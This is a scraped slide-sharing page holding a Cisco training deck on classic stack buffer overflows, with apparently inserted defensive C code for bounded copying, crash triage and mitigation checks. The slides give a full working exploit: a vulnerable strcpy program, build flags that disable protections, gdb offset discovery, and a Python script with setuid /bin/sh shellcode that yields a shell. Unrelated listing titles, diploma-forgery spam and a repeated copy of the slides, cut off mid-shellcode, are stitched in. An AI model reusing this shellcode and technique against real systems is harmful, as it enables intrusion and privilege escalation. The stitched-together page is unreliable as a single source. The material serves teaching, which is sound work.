Thank you Aleph One! 
Refresher on buffer overflow in the old days 
Alex Moneger 
Security Engineer
Buffer overflow refresher 
• First paper by Aleph One in 1996 in Phrack #49:
http://www.phrack.org/issues.html?issue=49&id=14
• No OS level protections at the time
• Works by writing past the buffer end, aka stuffing more data into a buffer than it can hold
• Goal is to overwrite some interesting control structure with our attacker data. Can be the saved EIP, but can be any function pointer
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
Stack refresher (again ;)) 
• Stack holds local variables, the address of the previous frame, and the address of where to return to
• Goal is to overwrite the saved EIP (referred to as SEIP)
• If we control SEIP, we control where the “ret” instruction will go, meaning we control EIP
[Figure: stack frame, top to bottom: SEIP, SEBP, local function storage]
The “classic” 
cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c 
#include <string.h> 
int vuln(char *stuff) { 
char buf[0x64] = {0}; 
strcpy(buf, stuff); 
return 1; 
} 
int main(int argc, char **argv) { 
vuln(argv[1]); 
return 0; 
} 
• “buf” has no boundary checking; “stuff” is attacker controlled
[Figure: stack frame, top to bottom: SEIP, SEBP, buf]
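A hardened counterpart of vuln() above, added here as an example (it is not part of the course material): the copy is bounded by the destination size, so the same over-long argv[1] can never reach SEBP or SEIP. The helper copy_bounded and the demo() driver are additions of this example.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x64             /* same 100-byte buffer as the original vuln() */

/* Hardened vuln(): returns 1 when the whole string fit (as the original did),
 * 0 when the input was too long; in that case nothing is written past buf. */
int vuln_safe(const char *stuff)
{
    char buf[BUF_SIZE] = {0};
    /* strnlen stops at BUF_SIZE, so an over-long string costs no full scan */
    size_t n = strnlen(stuff, BUF_SIZE);
    if (n >= BUF_SIZE)
        return 0;                 /* needs >= 101 bytes with the NUL: reject */
    memcpy(buf, stuff, n + 1);    /* n < BUF_SIZE, so the NUL fits too */
    return 1;
}

/* Truncating variant for callers that must accept any length: always
 * NUL-terminates and returns the number of bytes stored (without the NUL). */
size_t copy_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return 0;
    size_t n = strnlen(src, dst_size - 1);
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* Exercises both helpers with constructed inputs, including the slide's
 * 132-byte "A" argument and the 99/100-byte boundary; returns 1 if all hold. */
int demo(void)
{
    char attacker_sized[133], exact[101], small[8];
    memset(attacker_sized, 'A', 132);
    attacker_sized[132] = '\0';
    memset(exact, 'B', 100);
    exact[100] = '\0';

    int ok = vuln_safe("hello") == 1;                 /* fits: accepted */
    ok &= vuln_safe(attacker_sized) == 0;             /* 132 bytes: rejected */
    ok &= vuln_safe(exact) == 0;                      /* 100 bytes + NUL: rejected */
    exact[99] = '\0';
    ok &= vuln_safe(exact) == 1;                      /* 99 bytes + NUL: fits */
    ok &= copy_bounded(small, sizeof small, attacker_sized) == 7;
    ok &= strcmp(small, "AAAAAAA") == 0;              /* truncated, still terminated */
    printf("guarded copy checks %s\n", ok ? "passed" : "FAILED");
    return ok;
}

int main(int argc, char **argv)
{
    if (argc > 1) {
        printf("vuln_safe(argv[1]) = %d\n", vuln_safe(argv[1]));
        return 0;
    }
    return demo() ? 0 : 1;
}
```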
Making it exploitable 
• Previous program compiled with the following options:
cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize
kernel.randomize_va_space = 0
cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE -g -o ch3
• See how many security features we are disabling?
• Pretend we don’t have the sources: find the size of the local stack storage in the function prologue
cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp
804841d: 89 e5 mov ebp,esp 
8048421: 83 c4 80 add esp,0xffffff80 
cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)' 
-128 
Recon 
• Local storage for the function is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that
• Let’s figure out how much we need to overwrite to control EIP
• Max overwrite size = ebp - esp + SEBP + SEIP = 128 + 4 + 4 = 136
[Figure: stack frame, top to bottom: SEIP, SEBP, unknown padding (????), buf, unknown padding (????); the two ???? regions plus buf make up the 128 bytes of local storage]
Finding the offsets manually 
cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))' 
A => 0x41 B => 0x42 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14 
cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4 
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1 
Segmentation fault 
[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14 
• Doing this properly => use msf pattern_create.rb & pattern_offset.rb
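The dmesg lines above are exactly what a crash-triage or SOC script sees after a process dies. As an added example (not course code), this parses such lines, decodes the x86 page-fault error bits the kernel prints in hex, and flags an instruction pointer made of repeated input bytes, which is the signature of control flow landing in attacker-controlled data; the sample lines are constructed after the slide's output.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* x86 page-fault error code bits, printed by the kernel in hex ("error 14") */
#define PF_PROT  0x01   /* 0 = page not present, 1 = protection violation */
#define PF_WRITE 0x02   /* write access (else read) */
#define PF_USER  0x04   /* fault raised in user mode */
#define PF_INSTR 0x10   /* fault on an instruction fetch */

struct segfault {
    char comm[32];
    int pid;
    unsigned long addr, ip, sp, err;
};

/* Parses "[ts] comm[pid]: segfault at A ip B sp C error D"; 1 on success. */
int parse_segfault(const char *line, struct segfault *out)
{
    const char *p = strstr(line, "]: segfault at ");
    const char *q = strstr(line, "] ");          /* end of the timestamp */
    if (!p || !q || q > p)
        return 0;
    memset(out, 0, sizeof *out);
    if (sscanf(q + 2, "%31[^[][%d]", out->comm, &out->pid) != 2)
        return 0;
    if (sscanf(p, "]: segfault at %lx ip %lx sp %lx error %lx",
               &out->addr, &out->ip, &out->sp, &out->err) != 4)
        return 0;
    return 1;
}

/* True when all four bytes of a 32-bit value are the same printable byte,
 * e.g. 0x41414141: the fault address came straight from input filler. */
int is_filler_pattern(unsigned long v)
{
    unsigned b = v & 0xff;
    if (!isprint(b))
        return 0;
    return (v & 0xffffffffUL) == (b | b << 8 | b << 16 | b << 24);
}

/* 2 = EIP hijacked with input bytes, 1 = other user-mode instruction-fetch
 * fault, 0 = ordinary data fault. */
int classify(const struct segfault *f)
{
    int instr_fetch = (f->err & PF_INSTR) != 0;
    if (instr_fetch && f->addr == f->ip && is_filler_pattern(f->ip))
        return 2;
    return instr_fetch ? 1 : 0;
}

/* Severity of a raw line, or -1 if it is not a segfault line at all. */
int triage_line(const char *line)
{
    struct segfault f;
    return parse_segfault(line, &f) ? classify(&f) : -1;
}

void describe(const struct segfault *f)
{
    printf("%s[%d]: %s %s fault at %#lx (ip %#lx) -> severity %d\n",
           f->comm, f->pid,
           (f->err & PF_USER) ? "user-mode" : "kernel-mode",
           (f->err & PF_INSTR) ? "instruction-fetch" :
           (f->err & PF_WRITE) ? "write" : "read",
           f->addr, f->ip, classify(f));
}

/* Constructed sample lines modelled on the slide's dmesg output. */
static const char *samples[] = {
    "[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14",
    "[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14",
    "[613700.000000] ch3[18340]: segfault at 0 ip 080484b2 sp bffffd10 error 4",
};

int main(void)
{
    struct segfault f;
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++)
        if (parse_segfault(samples[i], &f))
            describe(&f);
    return 0;
}
```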
We’re going to overflow!!! 
1. Choose a shellcode
2. Compute its length, e.g. 40 bytes
3. Add the proper padding to overwrite SEIP: 112 - 40 = 72
4. Find the address of our shellcode
5. Append it to the buffer to redirect flow
[Figure: buffer layout, left to right: shellcode, junk (padding), SC address]
Finding buffer address 
cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"') 
Reading symbols from /home/cisco/src/seccon/ch3/ch3...done. 
gdb$ gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5 
804844e: 83 ec 80 sub esp,0xffffff80 
8048451: 5b pop ebx 
8048452: 5f pop edi 
8048453: 5d pop ebp 
8048454: c3 ret 
gdb$ gdb$ break *0x804844e 
Breakpoint 1 at 0x804844e: file ch3.c, line 9. 
gdb$ r 
gdb$ x/16w $esp 
0xbffffc70: 0xbffffc8c 0xbffffec9 0xb7ffeff4 0xbffffd70 
0xbffffc80: 0xb7fffac0 0xbffffd44 0xb7feb662 0x41414141 
0xbffffc90: 0x41414141 0x41414141 0x41414141 0x41414141 
0xbffffca0: 0x41414141 0x41414141 0x41414141 0x41414141 
gdb$ x/x 0xbffffc8c 
0xbffffc8c: 0x41414141 
gdb$ x/s 0xbffffc8c 
0xbffffc8c: 'A' <repeats 112 times>, "BBBB" 
gdb$ x/2w $ebp 
0xbffffcf8: 0x41414141 0x42424242 
gdb$ si 5 
--------------------------------------------------------------------------[regs] 
EAX: 00000001 EBX: 41414141 ECX: 00000000 EDX: 00000075 o d I t S z a P C 
ESI: 00000000 EDI: 41414141 EBP: 41414141 ESP: BFFFFD00 EIP: 42424242 
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
Summary 
• We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)
• We have the buffer’s address (0xbffffc8c)
• We have a shellcode (I’m a nice guy)
• Stuff all of it together
Shell time 
cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py 
#!/usr/bin/env python 
# -*- coding: utf-8 -*- 
import os 
import struct 
target = "ch3" 
overflow_len = 112 
ret_addr = 0xbffffc8c 
target_path = os.path.abspath(target) 
# setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0) 
sc = ("\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
"\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")
nop_sled = overflow_len - len(sc) 
sc_addr = struct.pack("<I", ret_addr) 
ex = "%s%s%s" % (sc, 'A'*nop_sled, sc_addr) 
os.execve(target_path, (target_path, ex), os.environ) 
Result 
cisco@kali:~/src/seccon/ch3$ invoke ch3.py 
$ id 
uid=1000(cisco) gid=1001(cisco) groups=1001(cisco) 
$ exit 
cisco@kali:~/src/seccon/ch3$ 
Variations 
• Small buffers (shellcode doesn’t fit): append the shellcode after the return address
[Figure: buffer layout, left to right: junk, SC address, shellcode]
• Unpredictable buffer address (stack size is not under control): put a NOP sled in front of the shellcode:
[Figure: buffer layout, left to right: NOP sled, shellcode, SC address]
• Use an environment variable to host your shellcode
Limitations 
• Shellcode is executed on the stack, so the stack needs to be executable
• Buffer address is known, so addresses can’t be randomized
• Stack frame is not protected (more on this later)
• There are no null bytes in our buffer address (this can be fixed easily)
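The flags from “Making it exploitable” and the limitations just listed can be checked from the binary itself rather than from memory of how it was built. Added example (not course code): a checksec-style reader of the ELF32 program headers that reports executable stack, stack protector and PIE; the ELF images it inspects are constructed in memory for the demo and are not loadable programs.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal ELF32 definitions (same layout as <elf.h>) so this builds anywhere. */
typedef struct {
    uint8_t  e_ident[16];
    uint16_t e_type, e_machine;
    uint32_t e_version, e_entry, e_phoff, e_shoff, e_flags;
    uint16_t e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx;
} Elf32Ehdr;                                  /* 52 bytes */
typedef struct {
    uint32_t p_type, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_flags, p_align;
} Elf32Phdr;                                  /* 32 bytes */
#define ET_EXEC 2
#define ET_DYN  3                             /* PIE executables are ET_DYN */
#define PT_GNU_STACK 0x6474e551               /* carries the stack permission bits */
#define PF_X 1
#define PF_W 2
#define PF_R 4

struct mitigations { int exec_stack, canary, pie; };

static int contains(const uint8_t *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0) return 1;
    return 0;
}

/* Fills *out from an ELF32 little-endian image; returns 0, or -1 if it is not one. */
int elf32_mitigations(const uint8_t *img, size_t len, struct mitigations *out)
{
    Elf32Ehdr eh;
    if (len < sizeof eh || memcmp(img, "\x7f""ELF", 4) != 0) return -1;
    memcpy(&eh, img, sizeof eh);
    if (eh.e_ident[4] != 1 || eh.e_ident[5] != 1) return -1;   /* ELFCLASS32, ELFDATA2LSB */
    int seen_gnu_stack = 0;
    uint32_t stack_flags = 0;
    for (unsigned i = 0; i < eh.e_phnum; i++) {
        Elf32Phdr ph;
        size_t off = eh.e_phoff + (size_t)i * eh.e_phentsize;
        if (off + sizeof ph > len) return -1;
        memcpy(&ph, img + off, sizeof ph);
        if (ph.p_type == PT_GNU_STACK) { seen_gnu_stack = 1; stack_flags = ph.p_flags; }
    }
    /* On 32-bit x86 Linux a missing PT_GNU_STACK also means an executable stack */
    out->exec_stack = !seen_gnu_stack || (stack_flags & PF_X) != 0;
    /* checksec-style heuristic: a protected binary references __stack_chk_fail by name */
    out->canary = contains(img, len, "__stack_chk_fail");
    out->pie = eh.e_type == ET_DYN;
    return 0;
}

/* Constructed image: header, one PT_GNU_STACK entry, then an optional symbol name. */
size_t make_test_elf(uint8_t *buf, size_t cap, uint16_t e_type, uint32_t stack_flags, int with_canary)
{
    Elf32Ehdr eh = {{0}};
    Elf32Phdr ph = {0};
    memcpy(eh.e_ident, "\x7f""ELF\x01\x01\x01", 7);
    eh.e_type = e_type; eh.e_machine = 3; eh.e_version = 1; eh.e_entry = 0x8048000;
    eh.e_phoff = sizeof eh; eh.e_ehsize = sizeof eh; eh.e_phentsize = sizeof ph; eh.e_phnum = 1;
    ph.p_type = PT_GNU_STACK; ph.p_flags = stack_flags; ph.p_align = 16;
    const char *sym = with_canary ? "__stack_chk_fail" : "";
    size_t n = sizeof eh + sizeof ph + strlen(sym) + 1;
    if (n > cap) return 0;
    memcpy(buf, &eh, sizeof eh);
    memcpy(buf + sizeof eh, &ph, sizeof ph);
    memcpy(buf + sizeof eh + sizeof ph, sym, strlen(sym) + 1);
    return n;
}

/* Packs the findings for a constructed build: bit0 exec stack, bit1 canary, bit2 PIE; -1 on error. */
int mitigation_bits(uint16_t e_type, uint32_t stack_flags, int with_canary)
{
    uint8_t img[128];
    struct mitigations m;
    size_t n = make_test_elf(img, sizeof img, e_type, stack_flags, with_canary);
    if (n == 0 || elf32_mitigations(img, n, &m) != 0) return -1;
    return m.exec_stack | m.canary << 1 | m.pie << 2;
}

static void report(const char *label, int bits)
{
    printf("%s: stack %s, canary %s, %s\n", label,
           bits & 1 ? "executable (-z execstack)" : "NX",
           bits & 2 ? "present" : "absent (-fno-stack-protector)",
           bits & 4 ? "PIE" : "no PIE (text at fixed addresses)");
}

int main(void)
{
    report("course build  ", mitigation_bits(ET_EXEC, PF_R | PF_W | PF_X, 0));
    report("hardened build", mitigation_bits(ET_DYN, PF_R | PF_W, 1));
    return 0;
}
```

On a real file, read it into a buffer and call elf32_mitigations on it; kernel.randomize_va_space still has to be checked on the host, since ASLR is a system setting, not a property of the binary.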
Now get to work 
• Compile and exploit ch3
• Try any of the different exploitation techniques described previously
• Don’t use the “invoke” script when trying to exploit. What is happening to the stack? Why is your exploit failing?
• Enable one memory protection (whichever). Check the effect on the exploit

 
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptxAI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
AI INTERACTION WITH HUMAN IN DAILY LIFE (1).pptx
 
Reciprocating Air Compressor and its Types
Reciprocating Air Compressor and its TypesReciprocating Air Compressor and its Types
Reciprocating Air Compressor and its Types
 
Youtube Transcript Sumariser- application of API
Youtube Transcript Sumariser- application of APIYoutube Transcript Sumariser- application of API
Youtube Transcript Sumariser- application of API
 
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
一比一原版(ucberkeley毕业证书)加州大学伯克利分校毕业证如何办理
 
How Cash App Trains Large Language Models For Customer Support
How Cash App Trains Large Language Models For Customer SupportHow Cash App Trains Large Language Models For Customer Support
How Cash App Trains Large Language Models For Customer Support
 
Sea Wave Energy - Renewable Energy Resources
Sea Wave Energy - Renewable Energy ResourcesSea Wave Energy - Renewable Energy Resources
Sea Wave Energy - Renewable Energy Resources
 
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
RAILWAYS, a vital part of our infrastructure, play a crucial role in ensuring...
 
Thermodynamics and Heat Transfer - KRCE.pptx
Thermodynamics and Heat Transfer - KRCE.pptxThermodynamics and Heat Transfer - KRCE.pptx
Thermodynamics and Heat Transfer - KRCE.pptx
 
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
355536825-03-Oil-Gas-Flow-Metering-System-pptx.pptx
 
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
Thesis on Assessment of Landslide Prone Area and Their Consequences  Due to C...Thesis on Assessment of Landslide Prone Area and Their Consequences  Due to C...
Thesis on Assessment of Landslide Prone Area and Their Consequences Due to C...
 
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
A Case of Unrecognized Peripartum Cardiomyopathy Which Was Noticed During Eme...
 

03 - Refresher on buffer overflow in the old days

  • 1. Thank you Aleph One!
Refresher on buffer overflow in the old days
Alex Moneger
Security Engineer
  • 2. Buffer overflow refresher
 First paper by Aleph One in 1996 in Phrack #49: http://www.phrack.org/issues.html?issue=49&id=14
 No OS level protections at the time
 Works by writing past the buffer end, aka stuffing more data into a buffer than it can hold
 Goal is to overwrite some interesting control structure with our attacker data. Can be saved EIP, but can be any function pointer
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 2
  • 3. Stack refresher (again ;))
 Stack holds local variables, the address of the previous frame, the address of where to return to
 Goal is to overwrite Saved EIP (referred to as SEIP)
 If we control SEIP, we control where the “ret” instruction will go, meaning we control EIP
Stack layout (figure, top to bottom): SEIP / SEBP / Local function storage
  • 4. The “classic”
cisco@kali:~/src/seccon/ch3$ pygmentize -g ch3.c
#include <string.h>
int vuln(char *stuff) {
    char buf[0x64] = {0};
    strcpy(buf, stuff);
    return 1;
}
int main(int argc, char **argv) {
    vuln(argv[1]);
    return 0;
}
 “buf” has no boundary checking. “stuff” is attacker controlled
Stack layout (figure, top to bottom): SEIP / SEBP / buf
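The slide's `strcpy()` sink next to a bounded replacement, as an added example that is not part of the original deck. The 0x64-byte local buffer and the shape of `vuln()` follow the slide; `vuln_checked()`, its accept/reject return convention and the `fits_in_buf()` helper that builds the test input are this example's own assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x64   /* same 100-byte local buffer as ch3.c on the slide */

/* The slide's sink, kept as-is for comparison: no length check, so any argument
 * longer than BUF_SIZE - 1 bytes writes past buf into SEBP and SEIP.
 * Deliberately never called below. */
int vuln(char *stuff) {
    char buf[BUF_SIZE] = {0};
    strcpy(buf, stuff);
    return 1;
}

/* Hardened form (assumed design, not the deck's code): measure the input with a
 * bound, refuse anything that would not fit together with its NUL terminator,
 * and only then copy. Rejecting beats silent truncation, which can create a
 * second class of bugs further down. Returns 1 on success, 0 when rejected. */
int vuln_checked(const char *stuff) {
    char buf[BUF_SIZE] = {0};
    if (stuff == NULL) {
        return 0;
    }
    size_t len = strnlen(stuff, BUF_SIZE);   /* never scans past BUF_SIZE bytes */
    if (len >= BUF_SIZE) {
        return 0;                            /* would overflow: reject */
    }
    memcpy(buf, stuff, len + 1);             /* len + 1 copies the terminating NUL */
    return 1;
}

/* Builds a constructed argument of n 'A' bytes (like the slides' python -c
 * payloads) and feeds it to vuln_checked(). Returns -1 if n is too large for
 * the scratch array, otherwise vuln_checked()'s result. */
int fits_in_buf(size_t n) {
    char arg[512];
    if (n >= sizeof arg) {
        return -1;
    }
    memset(arg, 'A', n);
    arg[n] = '\0';
    return vuln_checked(arg);
}

int main(void) {
    /* 99 bytes plus NUL fit exactly; 100 would already clobber the terminator;
     * 136 is the slide's "max overwrite size" that reaches SEIP. */
    size_t probes[] = { 0, 99, 100, 112, 136 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        printf("%3zu bytes of 'A': %s\n", probes[i],
               fits_in_buf(probes[i]) == 1 ? "accepted" : "rejected");
    }
    return 0;
}
```

The boundary is `BUF_SIZE - 1` payload bytes, not `BUF_SIZE`: the terminator needs its own byte, which is exactly what `strcpy()` forgets to account for.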
  • 5. Making it exploitable
 Previous program compiled with the following options:
cisco@kali:~/src/seccon/ch3$ sudo sysctl -a | grep randomize
kernel.randomize_va_space = 0
cisco@kali:~/src/seccon/ch3$ cc ch3.c -fno-stack-protector -z execstack -U_FORTIFY_SOURCE -g -o ch3
 See how many security features we are disabling?
 Pretend we don’t have sources: find the size of the local stack storage in the function prologue
cisco@kali:~/src/seccon/ch3$ objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 10 | grep --color esp
 804841d:       89 e5                   mov    ebp,esp
 8048421:       83 c4 80                add    esp,0xffffff80
cisco@kali:~/src/seccon/ch3$ python -c 'import exutil as e; print e.cmp2(0xffffff80)'
-128
  • 6. Recon
 Local storage for the function is 128 bytes. Nothing says that our vulnerable buf starts at the beginning of that
 Let’s figure out how much we need to overwrite to control EIP
 Max overwrite size = ebp – esp + SEBP + SEIP = 128 + 4 + 4 = 136
Stack layout (figure, top to bottom): SEIP / SEBP / ???? / buf / ???? (the 128 bytes of local storage)
  • 7. Finding the offsets manually
cisco@kali:~/src/seccon/ch3$ python -c 'print "A =>", hex(ord("A")), "B =>", hex(ord("B"))'
A => 0x41 B => 0x42
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*132+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*128+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*124+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14
cisco@kali:~/src/seccon/ch3$ # Continue decrementing by 4
cisco@kali:~/src/seccon/ch3$ (invoke ch3 $(python -c 'print "A"*112+"B"*4')) || dmesg | tail -n 1
Segmentation fault
[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14
 Doing this properly => Use msf pattern_create.rb & pattern_offset.rb
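Reading the kernel's segfault lines is also what an incident responder does when such crashes show up in `dmesg` on a production box. The following added example (not code from the deck) parses the lines shown on the slide, decodes the x86 page-fault error code the kernel prints in hex (bit 0: protection violation, else page not present; bit 1: write; bit 2: user mode; bit 4: instruction fetch), and reports whether the faulting instruction pointer is made entirely of the fill byte, which is the signature of a saved return address overwritten with input. The sample lines are copied from the slide; the `triage_line()` verdict scale and the fill-byte check are this example's own convention.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

struct segfault {
    unsigned long addr, ip, sp;   /* "segfault at ADDR ip IP sp SP" */
    unsigned err;                 /* "error CODE", printed by the kernel in hex */
};

/* Returns 1 and fills *out when the line is a kernel segfault report, else 0. */
int parse_segfault(const char *line, struct segfault *out) {
    const char *p = strstr(line, "segfault at ");
    if (p == NULL) {
        return 0;
    }
    return sscanf(p, "segfault at %lx ip %lx sp %lx error %x",
                  &out->addr, &out->ip, &out->sp, &out->err) == 4;
}

/* x86 page-fault error code: user-mode instruction fetch from a page that is not
 * mapped at all. "error 14" on the slide is 0x14 = bit 2 | bit 4 with bit 0 clear. */
int err_is_user_fetch_of_unmapped(unsigned err) {
    return (err & 0x1) == 0 && (err & 0x4) != 0 && (err & 0x10) != 0;
}

/* True when all four bytes of the 32-bit value equal the fill byte (0x41414141 for 'A'). */
int is_fill_pattern(unsigned long v, unsigned char fill) {
    return (uint32_t)v == 0x01010101u * fill;
}

/* Verdict for one log line (this example's own scale):
 *   0 = not a segfault line
 *   1 = a crash, but IP is not the fill byte (data fault, or another fill byte)
 *   2 = the CPU tried to fetch code from an address made of the fill byte:
 *       the overwritten SEIP was popped into EIP by "ret". */
int triage_line(const char *line, unsigned char fill) {
    struct segfault s;
    if (!parse_segfault(line, &s)) {
        return 0;
    }
    if (s.ip == s.addr && err_is_user_fetch_of_unmapped(s.err) && is_fill_pattern(s.ip, fill)) {
        return 2;
    }
    return 1;
}

int main(void) {
    /* Constructed input: the four dmesg lines as printed on the slide. */
    static const char *samples[] = {
        "[613635.624345] ch3[18312]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14",
        "[613642.976497] ch3[18318]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14",
        "[613663.605595] ch3[18325]: segfault at 41414141 ip 41414141 sp bffffcf0 error 14",
        "[613678.429167] ch3[18331]: segfault at 42424242 ip 42424242 sp bffffd00 error 14",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("line %zu: EIP = 'A' bytes? %s, EIP = 'B' bytes? %s\n", i + 1,
               triage_line(samples[i], 'A') == 2 ? "yes" : "no",
               triage_line(samples[i], 'B') == 2 ? "yes" : "no");
    }
    return 0;
}
```

The slide's walk-down from 132 to 112 bytes is exactly this verdict flipping from "EIP = 'A' bytes" to "EIP = 'B' bytes": once only the four `B`s land in SEIP, the fault address becomes 0x42424242. A fault with bit 0 set (error 15 in hex) instead of clear would say the page was mapped but not executable, which is what the NX limitation on slide 14 produces.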
  • 8. We’re going to overflow!!!
1. Choose a shellcode
2. Compute its length: e.g. 40 bytes
3. Add the proper padding to overwrite SEIP: 112 - 40 = 72
4. Find the address of our shellcode
5. Append to the buffer to redirect flow
Buffer layout (figure, low to high address): Shellcode / Junk / SC Address
  • 9. Finding buffer address
cisco@kali:~/src/seccon/ch3$ env -i gdb --quiet --args ./ch3 $(python -c 'print "A"*112+"BCDE"')
Reading symbols from /home/cisco/src/seccon/ch3/ch3...done.
gdb$ !objdump -d -j .text -M intel ch3 | grep -i 'vuln>:' -A 22 | tail -n 5
 804844e:       83 ec 80                sub    esp,0xffffff80
 8048451:       5b                      pop    ebx
 8048452:       5f                      pop    edi
 8048453:       5d                      pop    ebp
 8048454:       c3                      ret
gdb$ break *0x804844e
Breakpoint 1 at 0x804844e: file ch3.c, line 9.
gdb$ r
gdb$ x/16w $esp
0xbffffc70:     0xbffffc8c      0xbffffec9      0xb7ffeff4      0xbffffd70
0xbffffc80:     0xb7fffac0      0xbffffd44      0xb7feb662      0x41414141
0xbffffc90:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffca0:     0x41414141      0x41414141      0x41414141      0x41414141
gdb$ x/x 0xbffffc8c
0xbffffc8c:     0x41414141
gdb$ x/s 0xbffffc8c
0xbffffc8c:     'A' <repeats 112 times>, "BBBB"
gdb$ x/2w $ebp
0xbffffcf8:     0x41414141      0x42424242
gdb$ si 5
--------------------------------------------------------------------------[regs]
  EAX: 00000001  EBX: 41414141  ECX: 00000000  EDX: 00000075  o d I t S z a P C
  ESI: 00000000  EDI: 41414141  EBP: 41414141  ESP: BFFFFD00  EIP: 42424242
  CS: 0073  DS: 007B  ES: 007B  FS: 0000  GS: 0033  SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
  • 10. Summary
 We have the overflow length: 116 bytes (112 bytes + 4 bytes SEIP overwrite)
 We have the buffer’s address (0xbffffc8c)
 We have a shellcode (I’m a nice guy)
 Stuff all of it together
  • 11. Shell time
cisco@kali:~/src/seccon/ch3$ pygmentize ch3.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import struct

target = "ch3"
overflow_len = 112
ret_addr = 0xbffffc8c
target_path = os.path.abspath(target)

# setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0)
sc = ("\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
